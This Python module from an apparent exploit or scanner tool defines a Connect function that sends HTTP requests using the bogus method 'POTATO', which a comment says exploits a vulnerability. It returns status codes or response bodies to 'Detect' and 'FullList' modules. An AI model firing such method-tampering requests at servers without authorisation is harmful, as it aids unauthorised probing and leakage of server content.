#!/usr/bin/env python3
# File: core/Conn.py

import urllib.request
import urllib.error
from urllib.error import URLError, HTTPError


def Connect(method, url, timeout=15):
    # Make a connection to the server
    try:
        opener = urllib.request.build_opener(urllib.request.HTTPHandler())

        request = urllib.request.Request(url)
        request.get_method = lambda: "POTATO" #This is the bogus HTTP method used to exploit the vulnerability

        resp = opener.open(request, timeout=timeout)

    except HTTPError as e:
        # HTTPError is a valid HTTP response with a status code (and sometimes a body)
        if method == 1:
            return e.code
        try:
            body = e.read().decode("utf-8", errors="ignore")
        except Exception:
            body = ""
        return f"{e.code}{body}"

    except URLError:
        return 1
    except Exception:
        return 1

    if method == 1:  # Detect module
        return resp.getcode()

    if method == 2:  # FullList module
        body = resp.read()
        if isinstance(body, bytes):
            body = body.decode("utf-8", errors="ignore")
        return f"{resp.getcode()}{body}"

    # Unknown mode
    return 1
